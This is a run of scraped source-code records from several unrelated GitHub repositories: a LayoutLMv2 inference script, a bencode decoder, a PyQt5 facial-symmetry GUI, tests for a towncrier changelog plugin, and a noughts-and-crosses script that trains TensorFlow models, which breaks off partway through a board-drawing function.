LayoutLMv2Processor.from_pretrained(\"microsoft/layoutlmv2-base-uncased\", revision=\"no_ocr\")\n\ndebug = pd.read_pickle('debug.pkl')\ndebug_dataset = Dataset(annotations=debug,\n image_dir='debug_image_real_3/', \n processor=processor)\ndebug_dataloader = DataLoader(debug_dataset, batch_size=1)\ndata_loader = Data_Loader(replacing_labels = replacing_labels,processor = processor)\ntrain_dataloader, val_dataloader, test_dataloader, label2id, id2label, labels, all_labels = data_loader.load_data()\n\nmodel = LayoutLMv2ForTokenClassification.from_pretrained('Best',num_labels=len(labels))\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel.to(device)\noptimizer = AdamW(model.parameters(), lr=5e-5)\n\nmodel.eval()\nimport numpy as np\n\npreds_val = None\nout_label_ids = None\n\n# put model in evaluation mode\nmodel.eval()\nFinal_pred = {}\ncount =0\nfor batch in tqdm(debug_dataloader, desc=\"Evaluating\"):\n count = count +1\n with torch.no_grad():\n input_ids = batch['input_ids'].to(device)\n bbox = batch['bbox'].to(device)\n image = batch['image'].to(device)\n attention_mask = batch['attention_mask'].to(device)\n token_type_ids = batch['token_type_ids'].to(device)\n labels = batch['labels'].to(device)\n\n # forward pass\n 
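# (added) because labels are supplied, outputs carries a loss alongside the logits\n        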
outputs = model(input_ids=input_ids, bbox=bbox, image=image, attention_mask=attention_mask, \n token_type_ids=token_type_ids, labels=labels)\n \n if preds_val is None:\n preds_val = outputs.logits.detach().cpu().numpy()\n out_label_ids = batch[\"labels\"].detach().cpu().numpy()\n else:\n preds_val = np.append(preds_val, outputs.logits.detach().cpu().numpy(), axis=0)\n out_label_ids = np.append(\n out_label_ids, batch[\"labels\"].detach().cpu().numpy(), axis=0\n )\n pred = outputs.logits.argmax(-1).squeeze().tolist()\n\n for id, label in zip(input_ids.squeeze(), pred):\n if label == 0:\n continue\n if id2label[label] in Final_pred:\n Final_pred[id2label[label]].append(processor.tokenizer.decode(id))\n else:\n Final_pred[id2label[label]] = [processor.tokenizer.decode(id)]\n if count == 1:\n break\nprint(Final_pred)\nwith open(\"sample.json\", \"w\") as outfile:\n json.dump(Final_pred, outfile,indent = 4)\n#debug_labels = [id2label[idx] for idx in preds_val]","repo_name":"MinhTu1082001/Extraction_Colab","sub_path":"Old/test_Inference.py","file_name":"test_Inference.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42318472694","text":"class Decoder(object):\n def __init__(self):\n self.readers = {\n 'i': self.read_int,\n 'd': self.read_dict,\n 'l': self.read_list,\n }\n for digit in range(10):\n self.readers[str(digit)] = self.read_str\n\n def decode(self, data):\n length, value = self.read_token(data)\n return value\n\n def read_dict(self, data):\n assert data[0] == 'd'\n pos = 1\n values = {}\n while data[pos] != 'e':\n length, key = self.read_str(data[pos:])\n pos += length\n length, value = self.read_token(data[pos:])\n pos += length\n values[key] = value\n return pos + 1, values\n\n def read_int(self, data):\n assert data[0] == 'i'\n final_pos = data.find('e')\n value = int(data[1:final_pos])\n length = final_pos + 1\n return length, value\n\n def read_list(self, data):\n assert data[0] == 'l'\n pos = 1\n values = []\n while data[pos] != 'e':\n length, value = self.read_token(data[pos:])\n pos += length\n values.append(value)\n return pos+1, values\n\n def read_str(self, data):\n sep = data.find(':')\n length = int(data[:sep])\n value = data[sep+1:sep+length+1]\n return sep+length+1, value\n\n def read_token(self, data):\n marker = data[0]\n return self.readers[marker](data)\n","repo_name":"xchewtoyx/polyglot","sub_path":"torrent/py/torrent/bencode.py","file_name":"bencode.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13886665568","text":"import sys\n# import os\n# import cv2\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMessageBox, QGraphicsPixmapItem, QGraphicsScene, QStatusBar\nfrom PyQt5.QtGui import QImage, QPixmap\nfrom PyQt5.uic import loadUiType\nfrom PyQt5.QtCore import QStringListModel\nfrom symmetry_eval import *\n\nMainWindowForm, MainWindowBase = loadUiType('GUI/gui.ui')\n\n\ndef w_h_resize(img_path, w_re, h_re):\n img_path = str(img_path)\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n h, w = img.shape[0:2]\n if h < w:\n ratio = float(w / h)\n h_re = int(w_re / ratio)\n img = cv2.resize(img, (w_re, h_re))\n else:\n ratio = float(h / w)\n w_re = int(h_re / ratio)\n img = cv2.resize(img, (w_re, h_re))\n return img, w_re, h_re\n\n\nclass MainWindow(MainWindowBase, MainWindowForm):\n def __init__(self):\n # 
Initialization\n super(MainWindow, self).__init__()\n self.setupUi(self)\n self.setWindowTitle('Facial Symmetry Evaluation')\n self.paras = parameters()\n self.yolo_dir, self.crop_dir, self.san_dir, self.results_path = '', '', '', ''\n self.landmarks, self.landmarks_normal = [], []\n self.SI_Eyebrows, self.SI_Eyes, self.SI_Mouth = 0, 0, 0\n # StatusBar initialization\n self.statusBar = QStatusBar()\n self.statusBar.setStyleSheet('QStatusBar::item {border: none;}')\n self.setStatusBar(self.statusBar)\n self.statusBar.showMessage('Individual Project: Face symmetry evaluation')\n # Set events for buttons\n self.display_page1()\n self.pushButton_p11.clicked.connect(self.open_file) # Right Widget, Page1, 'Select File'\n self.pushButton_p12.clicked.connect(self.detect_faces) # Right Widget, Page1, 'Detext Face(s)'\n self.pushButton_p13.clicked.connect(self.display_page2) # Right Widget, Page1, 'Next'\n self.pushButton_p21.clicked.connect(self.display_page1) # Right Widget, Page2, 'Previous'\n self.pushButton_p22.clicked.connect(self.display_page3) # Right Widget, Page2, 'Start Evaluation'\n self.pushButton_p31.clicked.connect(self.display_page2) # Right Widget, Page3, 'Previous'\n self.pushButton_p32.clicked.connect(self.display_page1) # Right Widget, Page3, 'Retry'\n self.pushButton_Re.clicked.connect(self.page3_graphic_change)\n self.pushButton_BH.clicked.connect(self.page3_graphic_change)\n self.pushButton_EH.clicked.connect(self.page3_graphic_change)\n self.pushButton_EW.clicked.connect(self.page3_graphic_change)\n self.pushButton_EA.clicked.connect(self.page3_graphic_change)\n self.pushButton_MC.clicked.connect(self.page3_graphic_change)\n self.pushButton_MA.clicked.connect(self.page3_graphic_change)\n self.pushButton_MTA.clicked.connect(self.page3_graphic_change)\n self.listView.clicked.connect(self.face_list) # Right Widget, Page2, list\n\n def display_page1(self):\n self.stackedWidget.setCurrentIndex(0)\n self.label_1.setStyleSheet(\"background-color: rgb(255, 85, 0)\")\n self.label_2.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.label_3.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n\n def display_page2(self):\n if self.stackedWidget.currentIndex() == 0:\n if self.yolo_dir == '':\n QMessageBox.warning(self, 'Warning', 'Please select a picture and perform face detection!')\n else:\n self.stackedWidget.setCurrentIndex(1)\n self.label_1.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.label_2.setStyleSheet(\"background-color: rgb(255, 85, 0)\")\n self.label_3.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.yolo_dir = get_file(self.yolo_dir)\n slm = QStringListModel()\n slm.setStringList(self.yolo_dir)\n self.listView.setModel(slm)\n labeltext = f'Select 1 from {num_detect} face(s)'\n self.label_p21.setText(labeltext)\n else:\n self.stackedWidget.setCurrentIndex(1)\n self.label_1.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.label_2.setStyleSheet(\"background-color: rgb(255, 85, 0)\")\n self.label_3.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n\n def display_page3(self):\n self.stackedWidget.setCurrentIndex(2)\n self.label_1.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.label_2.setStyleSheet(\"background-color: rgb(100, 30, 0)\")\n self.label_3.setStyleSheet(\"background-color: rgb(255, 85, 0)\")\n Symmetry_Index = self.detect_landmarks()\n self.lineEdit_BH_L.setText(f'{Symmetry_Index[0]} px')\n self.lineEdit_BH_R.setText(f'{Symmetry_Index[1]} px')\n self.lineEdit_BH_D.setText(f'{Symmetry_Index[2]} px')\n 
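# (added) the remaining indices follow the same left/right/difference pattern for\n        # the eye and mouth metrics, ending with the three percentage scores\n        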
self.lineEdit_EH_L.setText(f'{Symmetry_Index[3]} px')\n self.lineEdit_EH_R.setText(f'{Symmetry_Index[4]} px')\n self.lineEdit_EH_D.setText(f'{Symmetry_Index[5]} px')\n self.lineEdit_EW_L.setText(f'{Symmetry_Index[6]} px')\n self.lineEdit_EW_R.setText(f'{Symmetry_Index[7]} px')\n self.lineEdit_EW_D.setText(f'{Symmetry_Index[8]} px')\n self.lineEdit_EA_L.setText(f'{Symmetry_Index[9]} px²')\n self.lineEdit_EA_R.setText(f'{Symmetry_Index[10]} px²')\n self.lineEdit_EA_D.setText(f'{Symmetry_Index[11]} px²')\n self.lineEdit_MC_L.setText(f'{Symmetry_Index[12]} px')\n self.lineEdit_MC_R.setText(f'{Symmetry_Index[13]} px')\n self.lineEdit_MC_D.setText(f'{Symmetry_Index[14]} px')\n self.lineEdit_MA_L.setText(f'{Symmetry_Index[15]} px²')\n self.lineEdit_MA_R.setText(f'{Symmetry_Index[16]} px²')\n self.lineEdit_MA_D.setText(f'{Symmetry_Index[17]} px²')\n self.lineEdit_MTA_D.setText(f'{Symmetry_Index[18]} °')\n self.lineEdit_Eva_EB.setText(f'{Symmetry_Index[19]} %')\n self.lineEdit_Eva_E.setText(f'{Symmetry_Index[20]} %')\n self.lineEdit_Eva_M.setText(f'{Symmetry_Index[21]} %')\n labelText = 'The face seems SYMMETRICAL !'\n if Symmetry_Index[19] < 90 or Symmetry_Index[20] < 90 or Symmetry_Index[21] < 90:\n labelText = 'The face seems ASYMMETRICAL ! '\n self.label_p31.setText(labelText)\n self.page3_graphic(self.results_path)\n\n def open_file(self):\n fileName, fileType = QtWidgets.QFileDialog.getOpenFileName(self, \"Select File\", os.getcwd(),\n \"Image Files(*.jpg *.jpeg)\")\n self.lineEdit.setText(fileName)\n self.paras.image = self.lineEdit.text()\n self.page1_graphic(self.paras.image)\n\n def page1_graphic(self, img_path):\n img, w_re, h_re = w_h_resize(img_path, 655, 545)\n frame = QImage(img, w_re, h_re, w_re * 3, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n item = QGraphicsPixmapItem(pix)\n scene = QGraphicsScene()\n scene.addItem(item)\n self.graphicsView_p1.setScene(scene)\n\n def page2_graphic(self, img_path):\n img, w_re, h_re = w_h_resize(img_path, 495, 495)\n frame = QImage(img, w_re, h_re, w_re * 3, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n item = QGraphicsPixmapItem(pix)\n scene = QGraphicsScene()\n scene.addItem(item)\n self.graphicsView_p2.setScene(scene)\n\n def page3_graphic(self, img_path):\n sender = self.sender()\n clickEvent = sender.text()\n img, w_re, h_re = w_h_resize(img_path, 390, 390)\n frame = QImage(img, w_re, h_re, w_re * 3, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n item = QGraphicsPixmapItem(pix)\n scene = QGraphicsScene()\n scene.addItem(item)\n self.graphicsView_p3.setScene(scene)\n\n def page3_graphic_change(self):\n sender = self.sender()\n clickEvent = sender.text()\n if clickEvent == u'Brows Height:':\n img_path = self.results_path.split('.')[0] + '_Eyebrows.jpg'\n elif clickEvent == u'Eyes Height:':\n img_path = self.results_path.split('.')[0] + '_EyeHeight.jpg'\n elif clickEvent == u'Eyes Width:':\n img_path = self.results_path.split('.')[0] + '_EyeWidth.jpg'\n elif clickEvent == u'Eyes Area:':\n img_path = self.results_path.split('.')[0] + '_EyeArea.jpg'\n elif clickEvent == u'Mouth Corner:':\n img_path = self.results_path.split('.')[0] + '_MouthCorner.jpg'\n elif clickEvent == u'Mouth Area:':\n img_path = self.results_path.split('.')[0] + '_MouthArea.jpg'\n elif clickEvent == u'Mouth Angle:':\n img_path = self.results_path.split('.')[0] + '_MouthAngle.jpg'\n else:\n img_path = self.results_path\n img, w_re, h_re = w_h_resize(img_path, 390, 390)\n frame = QImage(img, w_re, h_re, w_re * 3, QImage.Format_RGB888)\n pix = 
QPixmap.fromImage(frame)\n item = QGraphicsPixmapItem(pix)\n scene = QGraphicsScene()\n scene.addItem(item)\n self.graphicsView_p3.setScene(scene)\n\n def face_list(self, qModelIndex):\n self.page2_graphic(self.yolo_dir[qModelIndex.row()])\n self.crop_dir = self.yolo_dir[qModelIndex.row()]\n\n def detect_faces(self):\n global num_detect\n if not os.path.isfile(self.lineEdit.text()):\n QMessageBox.warning(self, 'Warning', 'Please select an image file')\n else:\n self.paras.image = self.lineEdit.text()\n self.paras.image = self.paras.image.replace('\\\\', '/').replace('\\\\\\\\', '/').replace('//', '/')\n results = yolo_detect(self.paras)\n if len(results) == 2:\n self.yolo_dir, num_detect = results[:]\n else:\n num_detect = 0\n QMessageBox.warning(self, 'Warning', 'There is no face detected, try other images please!')\n img_path = str(self.yolo_dir) + '/' + self.paras.image.split('/')[-1]\n face = 'faces' if num_detect > 1 else 'face'\n labeltext = f'{num_detect} {face} detected!'\n self.label_p11.setText(labeltext)\n self.page1_graphic(img_path)\n\n def detect_landmarks(self):\n img = cv2.imread(self.crop_dir) # read face image\n h, w = img.shape[0:2]\n h_re, w_re = int(h * 720 / h), int(w * 720 / h) # x=>640, scale y correspondingly\n img_resize = cv2.resize(img, dsize=(w_re, h_re), fx=1, fy=1,\n interpolation=cv2.INTER_LINEAR) # scale image to x=640\n cv2.imwrite(self.crop_dir, img_resize) # save scaled image for SAN\n self.san_dir, self.landmarks = SAN_detect(self.crop_dir, self.paras)\n self.results_path, self.landmarks_normal = landmark_normalize(self.san_dir, self.landmarks)\n SI_data = SI_calculate(self.results_path, self.landmarks_normal)\n return SI_data\n\n def closeEvent(self, event):\n reply = QMessageBox.question(self, 'Exit', 'Are you sure to quit?', QMessageBox.Yes | QMessageBox.Cancel)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"GaiusC/Face_Symmetry_Evaluation","sub_path":"main_gui.py","file_name":"main_gui.py","file_ext":"py","file_size_in_byte":11367,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"393375477","text":"import sys\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom baldrick.github.github_api import FILE_CACHE\nfrom baldrick.github.github_api import RepoHandler, PullRequestHandler\nfrom baldrick.plugins.github_towncrier_changelog import process_towncrier_changelog\n\n\nCONFIG_TEMPLATE = \"\"\"\n[ tool.towncrier ]\n package = \"testbot\"\n filename = \"NEWS.rst\"\n\n[ tool.testbot ]\n[ tool.testbot.towncrier_changelog ]\nenabled=true\n\"\"\"\n\nCUSTOM_TYPE_TEMPLATE = \"\"\"\n[tool.towncrier]\n package = \"sunpy\"\n directory = \"changelog/\"\n\n [[tool.towncrier.type]]\n directory = \"doc\"\n name = \"Improved Documentation\"\n showcontent = true\n\n [[tool.towncrier.type]]\n directory = \"trivial\"\n name = \"Trivial/Internal Changes\"\n showcontent = true\n\n[ tool.testbot ]\n[ tool.testbot.towncrier_changelog ]\nenabled=true\n\"\"\"\n\n\nclass TestTowncrierPlugin:\n\n def setup_method(self, method):\n\n self.get_file_contents_mock = patch('baldrick.github.github_api.PullRequestHandler.get_file_contents')\n self.get_base_branch_mock = patch('baldrick.github.github_api.PullRequestHandler.base_branch')\n a = self.get_base_branch_mock.start()\n a.return_value = \"master\"\n self.modified_files_mock = 
patch('baldrick.github.github_api.PullRequestHandler.get_modified_files')\n\n self.repo_handler = RepoHandler(\"nota/repo\", \"1234\")\n self.pr_handler = PullRequestHandler(\"nota/repo\", \"1234\")\n\n self.get_file_contents = self.get_file_contents_mock.start()\n self.modified_files = self.modified_files_mock.start()\n\n FILE_CACHE.clear()\n\n def teardown_method(self, method):\n self.get_file_contents_mock.stop()\n self.modified_files_mock.stop()\n self.get_base_branch_mock.stop()\n\n @pytest.mark.xfail(\n sys.platform.startswith('win'),\n reason='process_towncrier_changelog returns failure on Windows')\n def test_changelog_present(self, app):\n\n self.get_file_contents.return_value = CONFIG_TEMPLATE\n self.modified_files.return_value = (['./testbot/newsfragments/1234.bugfix'])\n\n with app.app_context():\n messages = process_towncrier_changelog(self.pr_handler, self.repo_handler)\n\n for message in messages.values():\n assert message['conclusion'] == 'success'\n\n @pytest.mark.xfail(\n sys.platform.startswith('win'),\n reason='process_towncrier_changelog returns failure on Windows')\n def test_changelog_type_substring(self, app):\n\n self.get_file_contents.return_value = CUSTOM_TYPE_TEMPLATE\n self.modified_files.return_value = (['changelog/1234.docfix.rst'])\n\n with app.app_context():\n messages = process_towncrier_changelog(self.pr_handler, self.repo_handler)\n\n assert messages['wrong_type']['conclusion'] == 'failure'\n","repo_name":"OpenAstronomy/baldrick","sub_path":"baldrick/plugins/tests/test_github_towncrier_changelog.py","file_name":"test_github_towncrier_changelog.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"29"} +{"seq_id":"31063539517","text":"# Here we build a model to play noughts and crosses\n# Eventually we hope to do this by Reinforcement Learning, but\n# code for that does not work properly yet. Instead we have\n# coded the usual algorithm and trained a model to mimic that.\n\n# We effectively treat the board as a linear array of 9 cells.\n# Each game position is represented as an array of shape (9, 2)\n# with a 1 in position (i, 0) if there is an O in position i,\n# and a 1 in position (i, 1) if there is an X in position i.\n# Player 0 plays Os and player 1 plays Xs.\n\nfrom re import I\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines\nimport os\nfrom itertools import combinations\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '-1'\n\nsrc_dir = os.path.dirname(os.path.realpath(__file__))\nmodels_dir = os.path.realpath(os.path.join(src_dir,'../models'))\n\nmodel = None\n\nBATCH_SIZE = 64\nSHUFFLE_SIZE = 100\nEPOCHS = 20\n\nboard = range(9)\n\n# The array below encodes the rules which determine when a \n# player has won. 
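# (Concretely: np.matmul(wins, pq[:, j]) counts player j's counters on each of
# the eight winning lines, so a maximum value of 3 means some line is fully
# occupied; that is exactly the test that has_win() applies below.)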
For example, wins[0] has 1s in positions \n# 0, 3 and 6, indicating that a player has won if they \n# have counters in positions 0, 3 and 6.\nwins = np.array([\n [1, 0, 0, 1, 0, 0, 1, 0, 0],\n [0, 1, 0, 0, 1, 0, 0, 1, 0],\n [0, 0, 1, 0, 0, 1, 0, 0, 1],\n [1, 1, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 1, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 1, 0, 0, 0, 1],\n [0, 0, 1, 0, 1, 0, 1, 0, 0]\n])\n\n# ee[i] is the vector of length 9 with a single 1 in position i\n# eee[i, j] is the array of shape (9, 2) with a single 1 in position (i, j)\nee = np.eye(9)\neee = np.zeros([9, 2, 9, 2])\n\n\ndef make_eee():\n global eee\n for i in range(9):\n for j in range(2):\n eee[i, j, i, j] = 1\n\n\nmake_eee()\n\n# corners[i] is 1 iff position i is a corner of the board\n# edges[i] is 1 iff position i is the middle of one edge of the board\ncorners = np.array([1, 0, 1, 0, 0, 0, 1, 0, 1])\nedges = np.array([0, 1, 0, 1, 0, 1, 0, 1, 0])\n\n# opposite[i] is the position opposite position i\nopposite = [8, 7, 6, 5, 4, 3, 2, 1, 0]\n\nempty_board = np.zeros([9, 2])\n\n\ndef add_o(pq, i): pq[i, 0] = 1\n\n\ndef add_x(pq, i): pq[i, 1] = 1\n\n# has_win(pq, 0) is True if, in the game state described by the \n# array pq, player 0 has filled a line (and so has won, if the\n# game state was reached by legal play). has_win(pq, 1) is similar.\n# has_win(pq) = has_win(pq, None) = has_win(pq, 0) or has_win(pq, 1)\ndef has_win(pq, player=None):\n w = [np.max(np.matmul(wins, pq[:, j])) >= 3 for j in [0, 1]]\n if player is None:\n return w[0] or w[1]\n else:\n return w[player]\n\n# plays(pq) is the list of positions which are empty (in the game \n# state described by the array pq), and so are available to the \n# next player.\ndef plays(pq, player=0):\n n = []\n for i in range(9):\n if pq[i, 0] == 0 and pq[i, 1] == 0:\n n.append(i)\n return n\n\n\n# near_wins(pq, i) is the list of positions at which player i could \n# play and thereby immediately win.\ndef near_wins(pq, player=0):\n n = []\n for i in range(9):\n if pq[i, 0] == 0 and pq[i, 1] == 0 and has_win(pq + eee[i, player], player):\n n.append(i)\n return n\n\n\n# forks(pq, i) is the list of positions at which player i could \n# play and thereby create two near-wins.\ndef forks(pq, player=0):\n f = []\n for i in range(9):\n if pq[i, player] == 0 and pq[i, 1-player] == 0 and \\\n len(near_wins(pq + eee[i, player], player)) > 1:\n f.append(i)\n return f\n\n\n# swap(pq) represents the same game state as pq but with the Os and Xs exchanged\ndef swap(pq):\n return np.array([[pq[i, 1-j] for j in range(2)] for i in range(9)])\n\n\n# This function expects a list moves = [moves_o, moves_x], where \n# moves_o and moves_x are disjoint lists of distinct board positions.\n# It returns the corresponding game state pq as an array of shape (9, 2)\ndef board_from_moves(moves):\n s = empty_board.copy()\n for i in [0,1]:\n for j in moves[i]:\n s += eee[j, i]\n return s\n\n\n# random_move(pq, i) returns a randomly selected legal move for\n# player i in game state pq. The return value is just an integer\n# (or None if the board is already full).\ndef random_move(pq, player=0):\n if has_win(pq) or len(plays(pq)) == 0:\n return None\n return np.random.choice(plays(pq, player))\n\n\n# suggest_move(pq, i) returns a suggested move for player i in \n# game state pq. The suggestions are optimal in the sense that \n# a win or draw is guaranteed if the suggestions are followed\n# throughout the game. 
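# A quick sanity check of the tactical helpers defined above (uses only
# functions from this file; position: O on squares 0 and 4, X on 1 and 5):

demo = board_from_moves([[0, 4], [1, 5]])
print(near_wins(demo, 0))  # [8] - playing 8 completes the 0-4-8 diagonal
print(forks(demo, 0))      # squares giving O two simultaneous threats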
The function returns None if the board \n# is already full.\ndef suggest_move(pq, player):\n if player == 0:\n pq0 = pq.copy()\n qp0 = swap(pq0)\n else:\n qp0 = pq.copy()\n pq0 = swap(qp0)\n if has_win(pq0) or len(plays(pq0)) == 0:\n return None\n n = near_wins(pq0)\n if len(n) > 0: return n[0]\n m = near_wins(qp0)\n if len(m) > 0: return m[0]\n f = forks(pq0)\n if len(f) > 0: return f[0]\n g = forks(qp0)\n if len(g) == 1: return g[0]\n for i in g:\n pq1 = pq0 + eee[i, 0]\n qp1 = swap(pq1)\n if len(near_wins(pq1)) > 0 and len(forks(qp1)) > 0:\n return i\n if pq0[4, 0] == 0 and pq0[4, 1] == 0: return 4\n for i in [0, 2, 6, 8]:\n if pq0[i, 0] == 0 and pq0[i, 1] == 0 and pq0[8-i, 1] == 1:\n return i\n for i in [0, 2, 6, 8, 1, 3, 5, 7]:\n if pq0[i, 0] == 0 and pq0[i, 1] == 0:\n return i\n return None\n\n\n# This function displays the game state pq and prompts the user\n# to enter a move for the specified player.\ndef input_move(pq, player=0):\n if player == 0:\n s = 'O'\n else:\n s = 'X'\n show_board_ascii(pq)\n prompt = 'Enter position (0-8) for next ' + s + ': '\n i = input(prompt)\n try:\n i = int(i)\n except ValueError:\n return None\n if i < 0 or i > 8:\n i = None\n return i\n\n\n# This function sets various global variables.\n# all_states is the list of all game states that could be seen \n# by player 0 in legal play (with either player 0 or player 1 \n# starting the game). It only includes the 4519 states in which \n# player 0 is required to respond; states are excluded if either \n# player has already won. \n#\n# all_states_suggestions is the corresponding list of suggested\n# moves, with one-hot encoding. In other words, if the suggestion\n# for state all_states[i] is to play in position j, then \n# all_states_suggestions[i] is the basis vector ee[j]\n#\n# all_dataset packages all_states and all_states_suggestions in\n# a tensorflow dataset (shuffled and batched)\ndef make_all_states():\n global states, all_states, all_states_suggestions, all_dataset\n all_states = []\n states = [[empty_board.copy()]]\n for i in range(1,9):\n states.append([])\n for s in states[i-1]:\n p = plays(s)\n k = 8\n while s[k, i % 2] == 0 and k >= 0: \n k = k-1\n for j in p:\n s1 = s + eee[j, i % 2]\n if j > k and not has_win(s1):\n states[i].append(s1)\n all_states += states[i]\n \n all_states_suggestions = list(map(\n lambda pq: ee[suggest_move(pq, 1)], \n all_states\n ))\n\n all_dataset = tf.data.Dataset.from_tensor_slices((all_states, all_states_suggestions))\n all_dataset = all_dataset.shuffle(SHUFFLE_SIZE).batch(BATCH_SIZE)\n\n return all_states\n\n\nmake_all_states()\n\n\n######################################################################\n# This section attempts to train a model to play noughts and \n# crosses using deep Q learning. It currently runs without errors\n# but does not learn to play even legal moves.\n#\n# In more detail, the idea is to calculate a function Q from game states\n# to vectors of length 9, with Q(pq)[i] interpreted as the expected \n# reward if player 0 plays i in state pq. Rewards are +1 for a win,\n# -1 for a loss, 0 for a draw and -5 for an illegal move. 
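# The "consistency condition" referred to just below is the one-step Bellman
# backup. A tiny standalone version of the target computation (a sketch;
# gamma = 1 to match the undiscounted games used in this file):

def bellman_target(reward, finished, q_next, gamma=1.0):
    # A state-action value should equal the immediate reward plus the best
    # value attainable from the successor state, if the game continues.
    if finished:
        return reward
    return reward + gamma * max(q_next)

print(bellman_target(0, False, [0.1, -0.2, 0.4]))  # -> 0.4
print(bellman_target(1, True, []))                 # terminal win -> 1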
The \n# method is to train the weights to force Q to satisfy a certain \n# consistency condition.\n\ndef make_Q_model(p=20, q=20, r=0.001):\n global Q_model\n inputs = tf.keras.Input(shape=(9, 2))\n reshape = tf.keras.layers.Reshape((18,))(inputs)\n hidden0 = tf.keras.layers.Dense(p, activation='relu')(reshape)\n hidden1 = tf.keras.layers.Dense(q, activation='relu')(hidden0)\n outputs = tf.keras.layers.Dense(9, activation='sigmoid')(hidden1)\n Q_model = tf.keras.Model(inputs=inputs, outputs=outputs, name=\"Q_model\")\n opt = tf.keras.optimizers.Adam(learning_rate=r)\n Q_model.compile(loss=\"mean_squared_error\", optimizer=opt, metrics=[\"accuracy\"])\n return Q_model\n\n\ndef update_Q(pq, n, alpha):\n Q_old = Q_model(pq.reshape((1,9,2)))\n Q_new = np.zeros((9))\n for i in range(9):\n for j in range(n):\n finished, reward, pq1, response = step(pq, i)\n if finished:\n Q_new += reward * ee[i]\n else:\n Q_new += np.max(Q_model(pq1.reshape(1,9,2))[0]) * ee[i]\n Q_new /= n\n Q_update = (1 - alpha) * Q_old + alpha * Q_new\n return Q_update\n\n\ndef train_Q_once(n, m, o, alpha):\n i = np.random.choice(len(all_states), m)\n x = np.array([all_states[i0] for i0 in i])\n y = np.array([update_Q(x[i0], n, alpha) for i0 in range(m)])\n Q_model.fit(x, y, epochs=o)\n\n\n######################################################################\n# This section attempts to train a model to play noughts and \n# crosses. The model takes a game state as input and produces\n# a probability vector of length 9 as output.\n\ndef make_model(p=20, q=20, r=0.001):\n global model\n inputs = tf.keras.Input(shape=(9, 2))\n reshape = tf.keras.layers.Reshape((18,))(inputs)\n hidden0 = tf.keras.layers.Dense(p, activation='relu')(reshape)\n hidden1 = tf.keras.layers.Dense(q, activation='relu')(hidden0)\n outputs = tf.keras.layers.Dense(9, activation='softmax')(hidden1)\n model = tf.keras.Model(inputs=inputs, outputs=outputs, name=\"model\")\n opt = tf.keras.optimizers.Adam(learning_rate=r)\n model.compile(loss=\"categorical_crossentropy\", optimizer=opt, metrics=[\"accuracy\"])\n return model\n\n\ndef save_model():\n l = model.layers\n p = l[3].input_shape[1]\n q = l[4].input_shape[1]\n model_dir = os.path.join(models_dir, 'ox_model_' + repr(p) + '_' + repr(q))\n model.save(model_dir)\n\n\ndef load_model(p=20, q=20):\n model_dir = os.path.join(models_dir, 'ox_model_' + repr(p) + '_' + repr(q))\n model = tf.keras.models.load_model(model_dir)\n return model\n\n\n# This function applies the model to a game state pq to generate\n# a probability distribution on the board positions, and then \n# selects a position randomly in accordance with that distribution.\n# (If the model is not well-trained then the move may be illegal, \n# resulting in an immediate loss.)\ndef model_move(pq, player=0):\n if player == 0:\n pq0 = pq.copy()\n else:\n pq0 = swap(pq.copy())\n prob = model.predict(pq0.reshape(1, 9, 2))[0]\n choices = range(9)\n return np.random.choice(choices, p=prob)\n\n\n# This function displays the given game state as an image \n# using matplotlib\ndef show_board(pq, winner=None):\n col_o = 'red'\n col_x = 'blue'\n if winner == 0: col_x = 'lightblue'\n if winner == 1: col_o = 'lightcoral'\n fig, ax = plt.subplots(figsize=(4, 4))\n ax.set_axis_off()\n ax.set_xlim((0, 3))\n ax.set_ylim((0, 3))\n ax.add_line(matplotlib.lines.Line2D([1, 1], [0, 3], color='grey'))\n ax.add_line(matplotlib.lines.Line2D([2, 2], [0, 3], color='grey'))\n ax.add_line(matplotlib.lines.Line2D([0, 3], [1, 1], color='grey'))\n 
